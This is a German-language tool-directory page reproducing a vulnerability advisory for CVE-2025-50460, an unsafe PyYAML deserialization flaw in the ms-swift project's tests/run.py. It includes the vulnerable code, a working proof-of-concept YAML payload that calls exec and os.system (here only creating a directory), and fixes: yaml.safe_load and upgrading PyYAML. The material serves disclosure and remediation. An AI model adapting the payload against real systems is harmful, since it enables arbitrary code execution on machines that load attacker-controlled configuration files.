Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2025-50460 — Technische Details und Exploit für CVE-2025-50460 | Kitploit
Tools/GitHubGitHub/anchor0221/cve-2025-50460
Statische AnalyseSchwachstellenanalyseCode-AnalyseExploitationPapers & ForschungLernen & Bildung
GitHubanchor0221/cve-2025-50460

CVE-2025-50460

Technische Details und Exploit für CVE-2025-50460

Repository anzeigen
vor 1 JahrNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2025-50460: Remote-Code-Ausführung in modelscope/ms-swift durch unsichere PyYAML-Deserialisierung

Status: Analyse ausstehend
Dieser CVE-Eintrag wurde für NVD-Anreicherungsmaßnahmen markiert.

Ein Remote-Code-Ausführung (RCE)-Sicherheitsproblem existiert im ms-swift-Projekt Version 3.3.0 aufgrund unsicherer Deserialisierung in tests/run.py unter Verwendung von yaml.load() aus der PyYAML-Bibliothek (Versionen ≤ 5.3.1). Wenn ein Angreifer den Inhalt der YAML-Konfigurationsdatei kontrollieren kann, die dem Parameter --run_config übergeben wird, kann beliebiger Code während der Deserialisierung ausgeführt werden. Dies kann zu einer vollständigen Kompromittierung des Systems führen. Die Sicherheitslücke wird ausgelöst, wenn eine bösartige YAML-Datei geladen wird, wodurch die Ausführung beliebiger Python-Befehle wie os.system() möglich wird. Es wird empfohlen, PyYAML auf Version 5.4 oder höher zu aktualisieren und yaml.safe_load() zu verwenden, um das Problem zu entschärfen.

Beschreibung

Ein Remote-Code-Ausführung (RCE)-Sicherheitsproblem existiert im modelscope/ms-swift-Projekt aufgrund der unsicheren Verwendung von yaml.load() in Kombination mit anfälligen Versionen der PyYAML-Bibliothek (≤ 5.3.1). Das Problem befindet sich im Skript tests/run.py, wo eine benutzerbereitgestellte YAML-Konfigurationsdatei mit yaml.load() und yaml.FullLoader deserialisiert wird.

Wenn ein Angreifer die an das Argument --run_config übergebene YAML-Konfigurationsdatei kontrollieren oder ersetzen kann, kann er eine schädliche Nutzlast injizieren, die zur Ausführung beliebigen Codes führt.

Betroffenes Repository

  • Projekt: modelscope/ms-swift
  • Betroffene Versionen: neueste
  • Datei: tests/run.py
  • GitHub-Permalink: https://github.com/modelscope/ms-swift/blob/e02ebfdf34f979bbdba9d935acc1689f8d227b38/tests/run.py#L420
  • Abhängigkeit: PyYAML ≤ 5.3.1

Angreifbarer Code

root@kitploit:~
if args.run_config is not None and Path(args.run_config).exists():
    with open(args.run_config, encoding='utf-8') as f:
        run_config = yaml.load(f, Loader=yaml.FullLoader)

Beweis des Konzepts (PoC)

Schritt 1: Erstellen einer schädlichen YAML-Datei (exploit.yaml)

root@kitploit:~
!!python/object/new:type
args: ["z", !!python/tuple [], {"extend": !!python/name:exec }]
listitems: "__import__('os').system('mkdir HACKED')"

Schritt 2: Ausführen mit anfälligem PyYAML (≤ 5.3.1)

root@kitploit:~
import yaml

with open("exploit.yaml", "r") as f:
    cfg = yaml.load(f, Loader=yaml.FullLoader)

Dies führt zur Ausführung von os.system, was die Code-Ausführung beweist.

Abhilfemaßnahmen

  • Ersetzen Sie yaml.load() durch yaml.safe_load()
  • Aktualisieren Sie PyYAML auf Version 5.4 oder höher

Beispiel für die Korrektur:

root@kitploit:~
# Before
yaml.load(f, Loader=yaml.FullLoader)

# After
yaml.safe_load(f)

CVE-Status

Autor

  • Entdeckt von: Yu Rong (戎誉) und Hao Fan (凡浩)
  • Kontakt: [[email protected] ]
Tool herunterladen
FeldWert
CVE-IDCVE-2025-50460
CVSS-ScoreTBD
CWECWE-502: Deserialisierung nicht vertrauenswürdiger Daten
Meldungsdatum2025-04-25
Offenlegungsdatum2025-07-30
Betroffene Versionneueste
Behebungsversion